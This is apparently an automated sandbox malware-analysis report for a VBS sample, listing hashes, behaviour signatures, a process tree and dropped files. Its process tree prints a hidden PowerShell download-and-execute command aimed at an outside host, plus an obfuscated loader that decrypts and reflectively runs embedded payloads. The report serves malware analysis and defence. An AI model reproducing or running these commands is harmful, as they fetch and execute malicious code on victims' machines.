Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
03/12/2024, 17:51
Static task
static1
Behavioral task
behavioral1
Sample
2570_output.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2570_output.vbs
Resource
win10v2004-20241007-en
General
-
Target
2570_output.vbs
-
Size
421KB
-
MD5
1304afcdfc224427dfe647dd10025628
-
SHA1
54de753563e6a041ca67a90e50c121cd32f2e125
-
SHA256
13f879d486e63ba54d45f500025f13cb63c83956e0493434a67692f3a47cbace
-
SHA512
23dcf2384265354d1596934f5d428df2518a410fd074ac6127c9f6b6ac896472542620966ffe6c39a3e74157f3eb3f09e2d481ee265f969861fcc5f3bbac0506
-
SSDEEP
6144:URCyzWhqzOEHu+s+7e7C8526sSil7tJA1ikRAG9cuyVa8iix6gwXUhkSn:w8hbmbh7uiWct2yVa8ArUhkSn
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2480 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2480 powershell.exe 344 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2480 powershell.exe Token: SeDebugPrivilege 344 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2436 wrote to memory of 2480 2436 WScript.exe 31 PID 2436 wrote to memory of 2480 2436 WScript.exe 31 PID 2436 wrote to memory of 2480 2436 WScript.exe 31 PID 2436 wrote to memory of 1176 2436 WScript.exe 33 PID 2436 wrote to memory of 1176 2436 WScript.exe 33 PID 2436 wrote to memory of 1176 2436 WScript.exe 33 PID 1176 wrote to memory of 2576 1176 cmd.exe 35 PID 1176 wrote to memory of 2576 1176 cmd.exe 35 PID 1176 wrote to memory of 2576 1176 cmd.exe 35 PID 2576 wrote to memory of 2636 2576 cmd.exe 37 PID 2576 wrote to memory of 2636 2576 cmd.exe 37 PID 2576 wrote to memory of 2636 2576 cmd.exe 37 PID 2576 wrote to memory of 344 2576 cmd.exe 38 PID 2576 wrote to memory of 344 2576 cmd.exe 38 PID 2576 wrote to memory of 344 2576 cmd.exe 38
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2570_output.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
-
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$qITC='LouFPXaduFPX'.Replace('uFPX', ''),'TUSuyraUSuynsUSuyfoUSuyrUSuymFUSuyinUSuyalUSuyBlUSuyockUSuy'.Replace('USuy', ''),'CrzEmWezEmWatezEmWDeczEmWryzEmWpzEmWtozEmWrzEmW'.Replace('zEmW', ''),'InTXcnvTXcnokeTXcn'.Replace('TXcn', ''),'ChavMYCngvMYCeEvMYCxtevMYCnvMYCsvMYCionvMYC'.Replace('vMYC', ''),'FroTZlrmTZlrBaTZlrsTZlre64TZlrStTZlrriTZlrngTZlr'.Replace('TZlr', ''),'CoMOrVpMOrVyTMOrVoMOrV'.Replace('MOrV', ''),'ReahjxadahjxLahjxiahjxneahjxsahjx'.Replace('ahjx', ''),'EoUWdnoUWdtroUWdyoUWdPooUWdioUWdntoUWd'.Replace('oUWd', ''),'EqSJhlemqSJhentqSJhAtqSJh'.Replace('qSJh', ''),'SuRkbpuRkbluRkbiuRkbtuRkb'.Replace('uRkb', ''),'GCJOUetCCJOUurCJOUrCJOUenCJOUtPrCJOUoCJOUceCJOUssCJOU'.Replace('CJOU', ''),'DeajkMcajkMoajkMmprajkMeajkMsajkMsajkM'.Replace('ajkM', ''),'MaasMVinasMVMoasMVduasMVleasMV'.Replace('asMV', '');powershell -w hidden;function gUZuM($CFHEm){$VtKjY=[System.Security.Cryptography.Aes]::Create();$VtKjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VtKjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VtKjY.Key=[System.Convert]::($qITC[5])('gEhsJeRdRC5Ki9l14TCSSipF/1hE8pGPMmODwPyopiw=');$VtKjY.IV=[System.Convert]::($qITC[5])('k4acgMLLeJA4HUn289xcAw==');$pKWcz=$VtKjY.($qITC[2])();$RhEHp=$pKWcz.($qITC[1])($CFHEm,0,$CFHEm.Length);$pKWcz.Dispose();$VtKjY.Dispose();$RhEHp;}function xBAEi($CFHEm){$EdEdU=New-Object System.IO.MemoryStream(,$CFHEm);$pWSoO=New-Object System.IO.MemoryStream;$mpgHU=New-Object System.IO.Compression.GZipStream($EdEdU,[IO.Compression.CompressionMode]::($qITC[12]));$mpgHU.($qITC[6])($pWSoO);$mpgHU.Dispose();$EdEdU.Dispose();$pWSoO.Dispose();$pWSoO.ToArray();}$tlpZd=[System.IO.File]::($qITC[7])([Console]::Title);$sQzRR=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 5).Substring(2))));$OzOEx=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 6).Substring(2))));[System.Reflection.Assembly]::($qITC[0])([byte[]]$OzOEx).($qITC[8]).($qITC[3])($null,$null);[System.Reflection.Assembly]::($qITC[0])([byte[]]$sQzRR).($qITC[8]).($qITC[3])($null,$null); "4⤵PID:2636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:344
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
420KB
MD5a21d4680c8d115c444119d6b1ca6aed6
SHA1fdbb2d3c7eb9ea5c93781f91bf2157d25f82c2f2
SHA2561f25a0b4e9b17c826aa68d775dab0605edbddf39963943358406285f157b4e9f
SHA512b3b9ce5c820399bd7f8f80af4300328a5153ae8b15f2b00c85dba1fc983d02e739cae84ded8e831e845443e3226ff778c146598b0089076fcd9ac59830a47452
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD59f7161d90acb2a9b98ceca68b20e6a25
SHA15f81a6e810eaaeebb0a9ecf2d062975c6a4c330c
SHA25665bdc84fa5af2800b5f2267f1bd872ff05089790f825ad0d3935c03ebee49afa
SHA5123d2c5eadb23b34b919d47e69409931a02345694b0a38b3f45374bf89868a35f9c2923122a650843d23b3a6dd5d6a24ffdcdbc34b64d7b7ef4c0fcadb1f7b2574
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K8Z5WTW90GAFMXQP4EOV.temp
Filesize7KB
MD5cd1eff8caaa3f36fafed05b0d8b6bfb3
SHA1b257679eea1317250067439bc10ae77688fd97c2
SHA256d930bd507036c9266261ca9e09e43ad778b638b9a67df330216d6937bfa037d8
SHA512e952652029f2e80109dd9e56933b6cdc28faff5caf07ec028c4347ade6619c6f2176b8deeabb8a8792112d2886646818e3dde8539196cd639b9d83b4be08c28d